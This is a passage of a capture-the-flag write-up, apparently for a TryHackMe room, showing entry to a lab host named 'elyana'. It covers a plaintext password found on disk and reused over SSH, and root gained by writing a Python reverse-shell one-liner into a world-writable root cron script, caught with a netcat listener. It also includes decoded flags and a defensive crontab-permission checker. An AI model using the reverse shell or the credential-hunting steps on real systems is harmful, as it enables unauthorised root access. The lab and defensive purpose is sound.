-rw-r--r-- 1 elyana elyana  807 Apr  4  2018 .profile
-rw-r--r-- 1 elyana elyana    0 Oct  5  2020 .sudo_as_admin_successful
-rw-rw-r-- 1 elyana elyana   59 Oct  6  2020 hint.txt
-rw------- 1 elyana elyana   61 Oct  6  2020 user.txt
bash-4.4$ cat user.txt
cat user.txt
cat: user.txt: Permission denied

There is a hint telling us that the password may be hidden somewhere on the system.
Code:
bash-4.4$ cat hint.txt
cat hint.txt
Elyana's user password is hidden in the system. Find it ;)

I look at the files on the system owned by elyana; the file private.txt catches my eye, and when I check its contents it gives us the elyana user's password.

Code:
bash-4.4$ find / -user elyana -type f 2>/dev/null
find / -user elyana -type f 2>/dev/null
/home/elyana/user.txt
/home/elyana/.bash_logout
/home/elyana/hint.txt
/home/elyana/.bash_history
/home/elyana/.profile
/home/elyana/.sudo_as_admin_successful
/home/elyana/.bashrc
/etc/mysql/conf.d/private.txt
bash-4.4$ cat /etc/mysql/conf.d/private.txt
cat /etc/mysql/conf.d/private.txt
user: elyana
password: E@syR18ght

Now that we have elyana's password, we can connect directly over SSH.
Code:
kali@kali:sshpass -p "E@syR18ght" ssh [email protected]
-bash-4.4$ cat user.txt
VEhNezQ5amc2NjZhbGI1ZTc2c2hydXNuNDlqZzY2NmFsYjVlNzZzaHJ1c259
-bash-4.4$ echo "VEhNezQ5amc2NjZhbGI1ZTc2c2hydXNuNDlqZzY2NmFsYjVlNzZzaHJ1c259" | base64 -d
THM{49jg666alb5e76shrusn49jg666alb5e76shrusn}

crontab, used on Linux and Unix systems, runs a command, script or application you specify at a time or interval you define. I will go down this route and try to become root.
Code:
-bash-4.4$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *  * * * root    cd / && run-parts --report /etc/cron.hourly
25 6  * * * root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6  * * 7 root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6  1 * * root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*  *    * * *   root    /var/backups/script.sh
Code:
bash-4.4$ ls -l /var/backups/script.sh
ls -l /var/backups/script.sh
-rwxrwxrwx 1 root root 73 Oct  7  2020 /var/backups/script.sh
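
The root cause here is a root cron job whose target is world-writable. As an added example (written for this writeup, not part of the original post or the room), the following check parses an /etc/crontab-style file and reports every absolute path referenced by a root job that is group- or world-writable or not owned by root. The crontab text and the file modes are constructed copies of what the page shows, so the example runs offline; swapping in real_stat runs the same check against the live filesystem.

```python
import os
import re
import stat
from typing import Callable, Dict, List, Optional, Tuple

# Constructed: a trimmed copy of the system-wide crontab shown on the page.
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *  * * * root    cd / && run-parts --report /etc/cron.hourly
25 6  * * * root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*  *    * * *   root    /var/backups/script.sh
"""

# Constructed stand-in for os.stat(): path -> (permission bits, owner uid).
# 0o777 reproduces the "-rwxrwxrwx root root" listing on the page.
SAMPLE_MODES: Dict[str, Tuple[int, int]] = {
    "/var/backups/script.sh": (0o777, 0),
    "/etc/cron.hourly": (0o755, 0),
    "/etc/cron.daily": (0o755, 0),
    "/usr/sbin/anacron": (0o755, 0),
}

StatFn = Callable[[str], Optional[Tuple[int, int]]]


def real_stat(path: str) -> Optional[Tuple[int, int]]:
    """Permission bits and owner uid of a real path, or None if it is missing."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return stat.S_IMODE(st.st_mode), st.st_uid


def sample_stat(path: str) -> Optional[Tuple[int, int]]:
    """Offline replacement for real_stat using the constructed table above."""
    return SAMPLE_MODES.get(path)


# Absolute paths inside a command string (a lone "/" as in "cd /" is not matched).
_ABS_PATH = re.compile(r"(?<![\w/])(/[\w./-]+)")


def parse_system_crontab(text: str) -> List[Tuple[str, str]]:
    """Return (user, command) pairs from /etc/crontab-style text.

    Comments, blank lines and VAR=value assignments are skipped; the
    system crontab layout is: m h dom mon dow user command.
    """
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue
        jobs.append((fields[5], fields[6]))
    return jobs


def find_weak_cron_targets(text: str, stat_fn: StatFn = real_stat) -> List[Dict[str, object]]:
    """Flag files referenced by root cron jobs that a non-root user could change."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for path in _ABS_PATH.findall(command):
            info = stat_fn(path)
            if info is None:
                continue  # path not present; nothing to assess
            mode, uid = info
            reasons = []
            if mode & stat.S_IWOTH:
                reasons.append("world-writable")
            if mode & stat.S_IWGRP:
                reasons.append("group-writable")
            if uid != 0:
                reasons.append(f"owned by uid {uid}, not root")
            if reasons:
                findings.append({"path": path, "mode": oct(mode),
                                 "command": command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_weak_cron_targets(SAMPLE_CRONTAB, sample_stat):
        print(f"{f['path']} ({f['mode']}): {', '.join(f['reasons'])}")
```

The fix the check points at is the obvious one: a script executed by root from cron should be owned by root and writable only by root (chmod 755 or 700), and the same applies to every directory on its path.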

I change the script as shown below. While doing so, on the other side I start listening with Netcat on the port I chose below.
Code:
#!/bin/bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("tun0 ıp adresiniz",istedğiniz port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Code:
kali@kali:/data/src$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.244.196] 46344
bash: cannot set terminal process group (2639): Inappropriate ioctl for device
bash: no job control in this shell
root@elyana:~# cd /root
cd /root
root@elyana:~# cat root.txt
cat root.txt
VEhNe3VlbTJ3aWdidWVtMndpZ2I2OHNuMmoxb3NwaTg2OHNuMmoxb3NwaTh9
root@elyana:~# cat root.txt | base64 -d
cat root.txt | base64 -d
THM{uem2wigbuem2wigb68sn2j1ospi868sn2j1ospi8}

THANKS FOR READING, I HOPE IT WAS HELPFUL.
Well done, thanks for your effort hocam :)
